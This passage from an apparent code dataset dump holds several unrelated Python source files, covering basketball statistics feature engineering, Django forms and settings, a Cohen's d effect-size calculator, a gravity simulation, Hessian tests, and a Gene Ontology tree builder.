df['awayteam_awaywp'] = 1-(df['away_losses_away']/df['away_games_away'])\n #dropping unneeded columns\n df.drop(['home_wins_home','away_losses_home','home_wins_away','away_losses_away'], axis = 1,inplace=True)\n return df\n\ndef point_spread(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with point spread stats calculated for home and away teams\n '''\n #Avg points spread in games\n #Home\n df['hometeam_pt_sprd'] = ((df['home_games_home'] * df['home_ps_home'])+(df['away_games_home'] * df['away_ps_home']))/df['hometeam_games']\n df['hometeam_opp_ppg'] = df['home_ppg'] - df['hometeam_pt_sprd']\n #Away\n df['awayteam_pt_sprd'] = ((df['home_games_away'] * df['home_ps_away'])+(df['away_games_away'] * df['away_ps_away']))/df['awayteam_games']\n df['awayteam_opp_ppg'] = df['away_ppg'] - df['awayteam_pt_sprd']\n #Pythagorean expected wins\n df['home_pyth_wd'] = df['hometeam_wins'] - df['hometeam_games'] * (df['home_ppg']**14)/((df['home_ppg']**14)+(df['hometeam_opp_ppg']**14))\n df['away_pyth_wd'] = df['awayteam_wins'] - df['awayteam_games'] * (df['away_ppg']**14)/((df['away_ppg']**14)+(df['awayteam_opp_ppg']**14))\n\n #Point Spread Variance\n df['hometeam_ps_var'] = ((df['hometeam_games']-1)*(df['home_ps_var_home']+df['away_ps_var_home'])+((df['hometeam_games']/2)*((df['home_ps_home']-df['away_ps_home'])**2)))/(2*df['hometeam_games']-1)\n df['awayteam_ps_var'] = ((df['awayteam_games']-1)*(df['home_ps_var_away']+df['away_ps_var_away'])+((df['awayteam_games']/2)*((df['home_ps_away']-df['away_ps_away'])**2)))/(2*df['awayteam_games']-1)\n df.drop(['hometeam_games', 'hometeam_wins','awayteam_games','awayteam_wins','home_ps_var_home', 'away_games_home', 'away_ps_home','away_ps_var_home', 'home_games_away', 'home_ps_away','home_ps_var_away', 'away_games_away','away_ps_var_away','home_games_home'],axis=1, inplace=True)\n return df\n\ndef misc_features(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with other stats calculated for home and away teams\n '''\n #Turnover percent - one of four factors\n df['home_tovpct'] = df['home_topg']/(df['home_fgapg'] + 0.44 * df['home_ftapg'] + df['home_topg'])\n df['away_tovpct'] = df['away_topg']/(df['away_fgapg'] + 0.44 * df['away_ftapg'] + df['away_topg'])\n #Free throw factor - another predictor\n df['home_ft_factor'] = df['home_ftmpg']/df['home_fgapg']\n df['away_ft_factor'] = df['away_ftmpg']/df['away_fgapg']\n #Pace - avg possessions per game\n df['home_pace'] = df['home_fgapg'] - df['home_orebpg'] + df['home_topg']\n df['away_pace'] = df['away_fgapg'] - df['away_orebpg'] + df['away_topg']\n df.drop(['home_ftmpg','away_ftmpg','home_trebpg','away_trebpg','home_topg','away_topg'],axis=1, inplace=True)\n return df\n\ndef home_minus_away(df,varlst):\n ''' Input: Dataframe with home and away stats\n Output: Dataframe with home stats minus away stats\n '''\n df2 = df.copy()\n for var in varlst:\n df2['diff{}'.format(var)] = df['home{}'.format(var)] - df['away{}'.format(var)]\n df2.drop(['home{}'.format(var),'away{}'.format(var)], axis=1, inplace=True)\n return df2\n\ndef per_possession(df,varlist):\n df3 = df.copy()\n for var in varlist:\n for ha in ['home_','away_']:\n df3['{0}{1}_perposs'.format(ha,var)] = df['{0}{1}pg'.format(ha,var)]/df['{}pace'.format(ha)]\n df3.drop(['{0}{1}pg'.format(ha,var)], axis=1, inplace=True)\n df3.drop(['home_pace','away_pace'], axis=1,inplace=True)\n return df3\n\ndef polynomial(df):\n df['hpsq'] = df['hometeam_pt_sprd']**2\n df['apsq'] = df['awayteam_pt_sprd']**2\n return df\n\n\ndef split_seasons(df):\n '''\n INPUT: pandas dataframe with player stats\n OUTPUT: 2 dataframes split between regular season and March Madness games.\n =========================================================================\n This will be our train/test split for each season\n Thank you to Steve Iannaccone for this dictionary - and some of the code\n '''\n TourneyDates = {2007: '2007-03-11',\n 2008: '2008-03-18',\n 2009: '2009-03-17',\n 2010: '2010-03-16',\n 2011: '2011-03-15',\n 2012: '2012-03-13',\n 2013: '2013-03-19',\n 2014: '2014-03-18',\n 2015: '2015-03-17',\n 2016: '2016-03-15',\n 2017: '2017-03-14',\n 2018: '2018-03-13'}\n df['madness_date'] = df['year'].map(TourneyDates)\n df_reg = df[df['DATE_STRING'] < df['madness_date']].reset_index()\n df_tourney = df[df['DATE_STRING'] >= df['madness_date']].reset_index()\n df_reg.drop(['level_0','index','madness_date','DATE_STRING','DATE','Home','Away','month'],axis=1, inplace=True)\n df_tourney.drop(['level_0','index','madness_date','DATE_STRING','month'],axis=1, inplace=True)\n return df_reg, df_tourney\n\nif __name__ == \"__main__\":\n #Feature engineering\n df = pd.read_pickle('data/modeling_db1.pkl')\n df = name_cleanup(df)\n df = shooting(df)\n df = record(df)\n df = point_spread(df)\n df = misc_features(df)\n df.dropna(inplace=True)\n df.to_pickle('data/modeling_whole.pkl')\n\n #creating train-test split on regular data\n df_reg1, df_tourney1 = split_seasons(df)\n df_reg1.to_pickle('data/reg_model_data_final1.pkl')\n df_tourney1.to_pickle('data/tourney_model_data_final1.pkl')\n\n #creating train-test split on home-minus away database\n varlist = ['_bpg','_drebpg','_orebpg','_foulpg','_ppg','_stlpg','_3papg','_fgapg','_ftapg','_apg','_fgp_var','_ppg_var','_fgpct','_3ppct','_ftpct','_efgpct','team_wp','team_pt_sprd','team_opp_ppg','team_ps_var','_tovpct','_ft_factor','_pace','_pyth_wd']\n df2 = home_minus_away(df, varlist)\n df2.to_pickle('data/modeling_homeaway.pkl')\n df_reg2, df_tourney2 = split_seasons(df2)\n df_reg2.to_pickle('data/reg_model_data_final_homeaway.pkl')\n df_tourney2.to_pickle('data/tourney_model_data_final_homeaway.pkl')\n\n #Creating more advanced stats in 3rd df\n varlist2 = ['dreb','oreb','foul','p','stl','3pa', 'fga', 'fta', 'a', 'b']\n df3 = per_possession(df,varlist2)\n df3 = polynomial(df3)\n df_reg3, df_tourney3 = split_seasons(df3)\n df_reg3.to_pickle('data/reg_model_data_final3.pkl')\n df_tourney3.to_pickle('data/tourney_model_data_final3.pkl')\n","sub_path":"src/feature_eng.py","file_name":"feature_eng.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"498694158","text":"from django import forms\nfrom django.forms import ModelForm, Textarea\nfrom .models import *\nfrom django.utils.translation import gettext_lazy as _\n\nSELL_CHOICES = [\n ('sell', 'Sell'),\n ('rent_monthly', 'Rent Monthly'),\n ('rent_weekly', 'Rent Weekly'),\n]\n\n\nclass Item(forms.ModelForm):\n description = forms.Textarea\n price = models.FloatField()\n category = forms.CharField(max_length=255, widget=forms.Select(choices=CATEGORY_CHOICES), )\n status = models.IntegerField(default=0)\n sell = forms.ChoiceField(choices=SELL_CHOICES)\n Img1 = models.ImageField(upload_to='images/', default='images/no-image.jpg')\n Img2 = models.ImageField(upload_to='images/', default='images/no-image.jpg')\n Img3 = models.ImageField(upload_to='images/', default='images/no-image.jpg')\n\n class Meta:\n model = Products\n fields = ['name', 'description', 'sell', 'price', 'category', 'Img1', 'Img2', 'Img3']\n labels = {\n 'name': _('Product Title'),\n 'description': _('Product Description'),\n 'price': _('Selling/Rental Price'),\n 'category': _('Product Category'),\n 'Img1': _('Upload Image 1'),\n 'Img2': _('Upload Image 2 (Optional)'),\n 'Img3': _('Upload Image 3 (Optional)'),\n 'sell': _('Sell or Rent'),\n }\n widgets = {\n\n }\n\n\nclass Edit_Item(forms.ModelForm):\n name = forms.CharField(max_length=255, widget=forms.TextInput(attrs={'readonly':'readonly'}))\n description = forms.Textarea\n price = models.FloatField()\n category = forms.CharField(max_length=255, widget=forms.Select(choices=CATEGORY_CHOICES), )\n status = models.IntegerField(default=0)\n sell = forms.ChoiceField(choices=SELL_CHOICES)\n\n class Meta:\n model = Products\n fields = ['name', 'description', 'sell', 'price', 'category']\n labels = {\n 'name': _('Edit Name'),\n 'description': _('Edit Description'),\n 'price': _('Selling/Rental Price'),\n 'category': _('Change Category'),\n 'sell': _('Sell or Rent'),\n }\n widgets = {\n\n }\n\n","sub_path":"products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"343884573","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 25 10:47:12 2020\n\n@author: L\n\nthere are at least 5 different and non-equivalent ways that people might \ncompute a d-like effect size (which they would invariably simply call “Cohen’s d”) \n... and the resulting effect sizes range from about 0.25 to 1.91.\n\nUseful links\nhttps://cran.r-project.org/web/packages/effectsize/effectsize.pdf\nhttp://jakewestfall.org/blog/index.php/2016/03/25/five-different-cohens-d-statistics-for-within-subject-designs/\nhttp://jeffrouder.blogspot.com/2016/03/the-effect-size-puzzler-answer.html\nhttps://forum.cogsci.nl/discussion/3013/what-denominator-does-the-cohens-d-use-on-jasp\nhttps://www.uv.es/uvetica/files/Cunningham_McCrum_Gardner2007.pdf\nhttps://github.com/mtorchiano/effsize/blob/master/R/CohenD.R\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom statsmodels.stats import weightstats as sms\nfrom statsmodels.stats.anova import AnovaRM\nfrom statsmodels.formula.api import ols\nfrom scipy import stats\n\n\n\n\n#~Testing Dataset ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n# Artificial movie ratings dataset\nx1 = [9, 7, 8, 9, 8, 9, 9, 10, 9, 9]\nx2 = [9, 6, 7, 8, 7, 9, 8, 8, 8, 7]\ndf = pd.DataFrame({'movie_1': x1,\n 'movie_2': x2})\ndf['difference'] = df['movie_1'] - df['movie_2']\ndfs = df[['movie_1', 'movie_2']].stack().reset_index()\nprint(df, '\\n')\n\nnobs_x1, nobs_x2 = np.size(x1), np.size(x2)\n\n\n#~ Dependent Groups / Within Samples ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\ndef cohens_d(x1=None, x2=None, S_x1=None, S_x2=None, ind=True, r=None, hedges_correction=False, nobs_x1=None, nobs_x2=None):\n \n realval_check = (int, float, np.float16, np.float32, np.float64)\n if isinstance(x1, realval_check) and isinstance(x2, realval_check):\n x1, x2 = [x1], [x2]\n \n \n x1, x2 = np.array(x1), np.array(x2)\n mean_x1, mean_x2 = np.mean(x1), np.mean(x2) # if means provided as x1,x2, then these will return the same vals.\n meandiff = mean_x1 - mean_x2\n \n if len(x1)==1 and len(x2)==1:\n # Then just the means were provided: we need both SDs otherwise error.\n if not (S_x1 and S_x2):\n raise ValueError(\"Requires both of `S_x1` & `S_x2`.\")\n else:\n from_summary = True\n else:\n # Then x1 and x2 are arrays and we proceed as usual\n from_summary = False\n S_x1, S_x2 = np.std(x1, ddof=1), np.std(x2, ddof=1)\n nobs_x1, nobs_x2 = len(x1), len(x2)\n \n if ind == True:\n # Independent samples \n if (from_summary == True) and (not (nobs_x1 and nobs_x2)):\n # Estimating using different pooled SD e.g. https://www.polyu.edu.hk/mm/effectsizefaqs/effect_size_equations2.html\n pooled_sd = np.sqrt((S_x1**2 + S_x2**2) / 2)\n print(pooled_sd)\n else:\n \n dof = nobs_x1 + nobs_x2 - 2\n pooled_sd = np.sqrt( ((nobs_x1 - 1) * S_x1 ** 2 + (nobs_x2 - 1) * S_x2 ** 2) / dof )\n \n else:\n # Related samples\n if from_summary == True:\n if not r: \n # We need the coefficient otherwise it is biased. Maybe just raise warning and use biased cohens d?\n raise ValueError(\"Correlation coefficient `r` required to compute effect size from summary statistics, but was not provided.\")\n else:\n # Need to compute r from x1 and x2 arrays\n r = np.corrcoef(x1, x2)[0][1]\n \n pooled_sd = np.sqrt(S_x1**2 + S_x2**2 - 2 * r * S_x1 * S_x2)\n # pooled_sd = np.mean([S_x1, S_x2]) # Hedges' g (average)\n \n # Calculate the effect size\n effectsize = meandiff / pooled_sd\n \n if hedges_correction:\n if (from_summary == True) and (not (nobs_x1 and nobs_x2)):\n raise ValueError(\"Requires number of observations from both groups in order to apply Hedges' correction, but these were not provided.\")\n else:\n if ind == False:\n # Re-calculate the effect size with the average pooled stdev\n effectsize = meandiff / np.mean([S_x1, S_x2])\n \n effectsize *= (1 - (3 / (4 * (nobs_x1 + nobs_x2) - 9)))\n \n return effectsize\n \n\n\n# Cohen's d calcs\nd_s_ind = cohens_d(x1, x2)\nd_s_rel = cohens_d(x1, x2, ind=False)\nd_s_ind_summary = cohens_d(np.mean(x1), np.mean(x2), np.std(x1, ddof=1), np.std(x2, ddof=1))\nd_s_rel_summary = cohens_d(np.mean(x1), np.mean(x2), np.std(x1, ddof=1), np.std(x2, ddof=1), r=0.73)\n\n# Hedges' g correction for Cohen's d\nd_s_ind_g = cohens_d(x1, x2, hedges_correction=True)\nd_s_rel_g = cohens_d(x1, x2, ind=False, hedges_correction=True)\nd_s_ind_summary_g = cohens_d(np.mean(x1), np.mean(x2), np.std(x1, ddof=1), np.std(x2, ddof=1), \n nobs_x1=10, nobs_x2=10, hedges_correction=True)\nd_s_rel_summary_g = cohens_d(np.mean(x1), np.mean(x2), np.std(x1, ddof=1), np.std(x2, ddof=1), \n nobs_x1=10, nobs_x2=10, r=0.73, hedges_correction=True)\n\n# Test them against the examples\nnp.testing.assert_allclose(round(d_s_ind, 2), 1.13) # from the paper\nnp.testing.assert_allclose(round(d_s_rel, 2), 1.5) # from the paper\nnp.testing.assert_allclose(round(d_s_ind_summary, 2), 1.13) # tested with g*power\nnp.testing.assert_allclose(round(d_s_rel_summary, 2), 1.13) # tested from here ---> https://www.socscistatistics.com/effectsize/default3.aspx\nnp.testing.assert_allclose(round(d_s_ind_g, 2), 1.08) # from the paper\nnp.testing.assert_allclose(round(d_s_rel_g, 2), 1.08) # from the paper\nnp.testing.assert_allclose(round(d_s_ind_summary_g, 2), 1.08) # tested from here ---> https://www.socscistatistics.com/effectsize/default3.aspx\nnp.testing.assert_allclose(round(d_s_rel_summary_g, 2), 1.08) # tested from here ---> https://www.socscistatistics.com/effectsize/default3.aspx\n\n\nprint(f\"Cohens d from independent samples data: {d_s_ind}\")\nprint(f\"Cohens d from paired samples data: {d_s_rel}\")\nprint(f\"Cohens d from independent samples data using summary stats: {d_s_ind_summary}\")\nprint(f\"Cohens d from paired samples data using summary stats: {d_s_rel_summary}\")\n\nprint(f\"Hedges g from independent samples data: {d_s_ind_g}\")\nprint(f\"Hedges g from paired samples data: {d_s_rel_g}\")\nprint(f\"Hedges g from independent samples data using summary stats: {d_s_ind_summary_g}\")\nprint(f\"Hedges g from paired samples data using summary stats: {d_s_rel_summary_g}\")\n\nprint(df.describe())\n","sub_path":"statistics/effect_sizes.py","file_name":"effect_sizes.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"95981518","text":"# -*- coding: utf-8 -*-\nimport os\n\nadmins = ['Tyranic-Moron', 'T-M|Work', 'Tyranic_Moron', 'T-M|Asleep', 'GarrusVakarian', 'LordCustardSmingleigh', 'XelaReko', 'XelaReco', 'dave_random', 'ElementalAlchemist', 'Homoglyph', 'Heufy|Work', 'Heufneutje', 'Mara']\n\nfinger = 'GET YOUR FINGER OUT OF THERE'\nversion = '0.7.0' # 3 major features left to implement before I'll consider it 1.0.0 (listed below)\n# Unified command data storage (may decide not to bother, independent also works and has its own benefits)\n# Command Aliasing\n# Command Chaining\nsource = 'https://github.com/MatthewCox/PyMoronBot/'\n\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\nlogPath = os.path.join(dname, 'logs')\n","sub_path":"GlobalVars.py","file_name":"GlobalVars.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"14026412","text":"from OpenGL.GLUT import *\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\n\r\nimport random\r\nimport numpy as np\r\n\r\nfrom TUGameEngine import TUGame\r\n\r\nclass myGame(TUGame.Game):\r\n def __init__(self, w, h, title):\r\n super().__init__(w, h, title)\r\n\r\n self.loc = []\r\n self.vel = []\r\n self.mass = []\r\n self.force = []\r\n self.loc.append(np.array([-15., 5., 0.])) #append : 배열에 어떤값을 넣는 것\r\n self.loc.append(np.array([15., -5., 0.]))\r\n self.vel.append(np.array([5., 0., 0.]))\r\n self.vel.append(np.array([-5., 0., 0.]))\r\n self.mass.append(1.0)\r\n self.mass.append(20.0)\r\n self.force.append(np.array([0., 0., 0.]))\r\n self.force.append(np.array([0., 0., 0.]))\r\n\r\n self.cameraAt([0, 0, 50], [0, 0, 0])\r\n\r\n # self.setBackground(b\"background.jpg\")\r\n\r\n def initObjects(self): #오브젝트를 원래 상태로 되돌림\r\n self.loc[0] = np.array([-15., 5., 0.])\r\n self.loc[1] = np.array([15., -5., 0.])\r\n self.vel[0] = np.array([5., 0., 0.])\r\n self.vel[1] = np.array([-5., 0., 0.])\r\n\r\n def frame(self):\r\n\r\n dt = self.getDt()\r\n\r\n super().frame()\r\n # your code here\r\n G = 100 #중력 계수\r\n m = [self.mass[0], self.mass[1]]\r\n x01 = self.loc[1] - self.loc[0]\r\n dist = np.linalg.norm(x01) #linalg.norm : 벡터의 길이를 반환 ##두 물체사이의 거리\r\n fdir = [x01/dist, -x01/dist] #힘의 방향\r\n mg = G * m[0] * m[1] / dist**2 #만유 인력\r\n\r\n # compute force\r\n for i in range(0, 2):\r\n self.force[i] = fdir[i] * mg ##만유인력을 방향을 곱해서 힘생성\r\n\r\n # simulate with the force\r\n for i in range(0, 2):\r\n self.vel[i] += self.force[i] * dt / m[i] #속도를 시간으로 미분시 가속도 ##힘을 적분한게 아니라 가속을 적분한것\r\n self.loc[i] += self.vel[i] * dt\r\n\r\n for balls in self.loc: # == for i in range(2):\r\n self.drawBall(balls) #self.drawBall(self.loc[i])\r\n\r\n super().afterFrame()\r\n\r\ngame = myGame(500, 500, b\"gravity\")\r\ngame.grid(True)\r\n\r\ndef key(k, x, y):\r\n if k is b' ':\r\n if game.timer.timerRunning:\r\n game.timerStop()\r\n else:\r\n game.timerStart()\r\n elif k is b'r':\r\n game.timerReset()\r\n game.initObjects()\r\n\r\ndef draw():\r\n game.frame()\r\n\r\n\r\ngame.start(draw, key)","sub_path":"05_TwoObject.py","file_name":"05_TwoObject.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"499729816","text":"import numpy\nimport nuctools\n\nimport os\nfrom numpy.testing import assert_almost_equal\n\n\ndata_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'files')\npattern = open(os.path.join(data_path, 'hessian.pattern')).read()\nstring = open(os.path.join(data_path, 'hessian.out')).read()\ndata = nuctools.iohelp.float_array(\n nuctools.iohelp.find(pattern, string))\n\nix = nuctools.iohelp.cframe.ix_tril(n=9, w=5)\nhess_tril = nuctools.math.array(shape=(9, 9), ix=ix, data=data)\nhessian = hess_tril + numpy.tril(hess_tril, k=-1).T\n\nhessian_ref = numpy.loadtxt(os.path.join(data_path, 'hessian.txt'))\nassert_almost_equal(hessian, hessian_ref, decimal=10)\n\n# PROJECTION\nLABELS = ('o', 'h', 'h')\nCOORDS = ((0.0000000000, 0.0000000000, -0.1247219248),\n (0.0000000000, -1.4343021349, 0.9864370414),\n (0.0000000000, 1.4343021349, 0.9864370414))\ncoords = nuctools.mol.centered_coordinates(labels=LABELS, coords=COORDS)\n\naxes = nuctools.mol.filtered_inertia_axes(labels=LABELS, coords=COORDS)\n\nmasses = nuctools.mol.masses(labels=LABELS)\ne_t = nuctools.mol.translations(masses=masses, axes=axes)\ne_r = nuctools.mol.rotations(masses=masses, coords=coords, axes=axes)\ne_tr = numpy.hstack((e_t, e_r))\n\nprint(numpy.dot(e_tr.T, e_tr).round(10))\n\nm = numpy.repeat(numpy.sqrt(masses), 3)\np = numpy.eye(*hessian.shape) - numpy.dot(e_tr, e_tr.T)\np = numpy.linalg.multi_dot([numpy.diag(m), p, numpy.diag(1./m)])\n\nhess = numpy.linalg.multi_dot([p, hessian, p.T])\n# hess = numpy.linalg.multi_dot([p, hess, p.T])\n# hess = numpy.linalg.multi_dot([p, hess, p.T])\n\nprint(hess.round(3))\n# assert_almost_equal(hess, hessian_ref, decimal=10)\nprint((hess - hessian_ref).round(6))\n","sub_path":"nuctools/examples/iohelp/molpro/hessian.py","file_name":"hessian.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"175576279","text":"\"\"\"\nTest postgres module.\n\n\"\"\"\nfrom hamcrest import assert_that, has_entries\n\nfrom docker_etude import Composition, Source\n\n\ndef test_postgres_module():\n source = Source.load_source()\n module = source.load_module(\"postgres\")\n composition = Composition.build(module)\n\n assert_that(\n composition.to_dict(),\n has_entries(\n version=\"3\",\n networks=None,\n services={\n \"postgres\": dict(\n container_name=\"postgres\",\n image=\"postgres\",\n ports=[\n \"5432:5432\",\n ],\n volumes=[\n \"postgres-data:/var/lib/postgresql/data\",\n ],\n ),\n },\n volumes={\n \"postgres-data\": None,\n },\n ),\n )\n","sub_path":"docker_etude/tests/modules/test_postgres.py","file_name":"test_postgres.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"321133149","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: d:\\shared\\tim_working\\development\\github\\pylirious\\pylirious\\mm-api\\python\\mm\\selection.py\n# Compiled at: 2016-07-24 13:10:59\nimport mmapi\nfrom convert import *\nfrom tool import *\n\ndef clear_face_selection(remote):\n \"\"\"Clear the current face selection (if there is one) and exit the Selection Tool\"\"\"\n cancel_tool(remote)\n\n\ndef select_all(remote):\n \"\"\"Select all faces of the active object (will initialize a Selection Tool if necessary)\"\"\"\n cmd = mmapi.StoredCommands()\n cmd.AppendCompleteToolCommand('cancel')\n cmd.AppendBeginToolCommand('select')\n cmd.AppendSelectCommand_All()\n remote.runCommand(cmd)\n\n\ndef selection_utility_command(remote, command_name):\n \"\"\"Run a selection utility command (see ::AppendSelectUtilityCommand in StoredCommands.h)\"\"\"\n cmd = mmapi.StoredCommands()\n cmd.AppendSelectUtilityCommand(command_name)\n remote.runCommand(cmd)\n\n\ndef select_facegroups(remote, groups_list):\n \"\"\"Select the faces which have a facegroup ID in groups_list\"\"\"\n cmd = mmapi.StoredCommands()\n vgroups = mmapi.vectori()\n for group in groups_list:\n vgroups.push_back(group)\n\n cmd2 = mmapi.StoredCommands()\n cmd2.AppendSelectCommand_ByFaceGroups(vgroups)\n remote.runCommand(cmd2)\n\n\ndef select_inside_sphere(remote, sphere_center, sphere_radius):\n \"\"\"Select the faces inside the sphere with given center/radius. Requires active Selection Tool.\"\"\"\n cmd = mmapi.StoredCommands()\n cmd.AppendSelectCommand_InsideSphere(sphere_center[0], sphere_center[1], sphere_center[2], sphere_radius)\n remote.runCommand(cmd)","sub_path":"pycfiles/pyliseberg-1.0-py2-none-any/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"253601479","text":"import pandas as pd\nfrom goatools import obo_parser\n\ngo_tree = open('data/go_tree.tsv', 'w')\ngo_tree.write('parent\\tchild\\ttype\\ttree\\n')\n\nobo = obo_parser.GODag('data/go-basic.obo')\n\nfor term in list(obo.keys()):\n\tif not obo[term].is_obsolete:\n\t\tfor parent in obo[term].parents:\n\t\t\tif not parent.is_obsolete:\n\t\t\t\tgo_tree.write('%s\\t%s\\tterm\\tTREE\\n' % (parent.id, term))\n\n# go_tree.close()\n\n# del obo\n\ngene_map = {}\nwith open('data/gene_map.tsv','r') as lines:\n\tfor line in lines:\n\t\tkey, value = line.split('\\t')\n\t\tgene_map[key] = value.rstrip()\n\n\nassociation_head = ['DB','DB_Object_ID','DB_Object_Symbol','Qualifier','GO_ID','DB_Ref','evidence','with','aspec','DB_Object_Name','DB_Object_Synonym','DB_Object_Type','taxon','Date','assigned_by','extension','gene_product_id']\ngene_association = pd.read_csv('data/gene_association.sgd', names=association_head, sep='\\t', skiprows=18)\n# once manipulated, can trim down only to entries that have our genes from Costanzo\n\ngene_association = gene_association.loc[gene_association['DB_Object_Symbol'].isin(gene_map.keys())]\ngene_association['gene'] = gene_association.apply(lambda row: gene_map[row.DB_Object_Symbol], axis=1)\n\ngene_to_go = gene_association.loc[:,['GO_ID','gene']]\n\ndel gene_association\n\nobo_keys = obo.keys()\nfor index, row in gene_to_go.iterrows():\n\tif row['GO_ID'] in obo_keys and not obo[row['GO_ID']].is_obsolete:\n\t\tgo_tree.write('%s\\t%s\\tgene\\tTREE\\n' % (row['GO_ID'], row['gene']))\n\nfor term in ['GO:0008150','GO:0005575','GO:0098772']:\n\tgo_tree.write('%s\\t%s\\tterm\\tTREE\\n' % ('GO:00SUPER', term))\n\n\n\ngo_tree.close()\n\n","sub_path":"data-builder/gwa_prepare_ontology_file.py","file_name":"gwa_prepare_ontology_file.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"136329434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for {{cookiecutter.project_name}} project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nfrom os.path import join\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n########## DEBUG CONFIGURATION\nif os.environ.get(\"DATABASE_URL\", None):\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\n DEBUG = False\nelse:\n DEBUG = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\nTEMPLATE_DEBUG = DEBUG\n########## END DEBUG CONFIGURATION\n\n\n########## SECRET CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Note: This key only used for development and testing.\nSECRET_KEY = \"ASDFhasdlfjasdfasdghpoawrngasdf\"\n########## END SECRET CONFIGURATION\n\n\n########## FIXTURE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\nFIXTURE_DIRS = (\n join(BASE_DIR, 'fixtures'),\n)\n########## END FIXTURE CONFIGURATION\n\n\n########## MANAGER CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\nADMINS = (\n ('{{cookiecutter.author_name}}', '{{cookiecutter.email}}'),\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\nMANAGERS = ADMINS\n########## END MANAGER CONFIGURATION\n\n\n########## DATABASE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nimport dj_database_url\nDATABASES = {'default': dj_database_url.config()}\nif DATABASES == {'default': {}}:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': \"{{cookiecutter.repo_name}}\",\n }\n }\n########## END DATABASE CONFIGURATION\n\n\n########## GENERAL CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone\nTIME_ZONE = 'America/Los_Angeles'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = 'en-us'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n########## END GENERAL CONFIGURATION\n\n\n########## MEDIA CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\nMEDIA_ROOT = join(BASE_DIR, 'media')\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url\nMEDIA_URL = '/media/'\n########## END MEDIA CONFIGURATION\n\n########## MIDDLEWARE CONFIGURATION\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n########## END MIDDLEWARE CONFIGURATION\n\n\n########## STATIC FILE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root\nSTATIC_ROOT = 'staticfiles'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\nSTATIC_URL = '/static/'\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\nSTATICFILES_DIRS = (\n join(BASE_DIR, 'static'),\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\nSTATICFILES_FINDERS = (\n 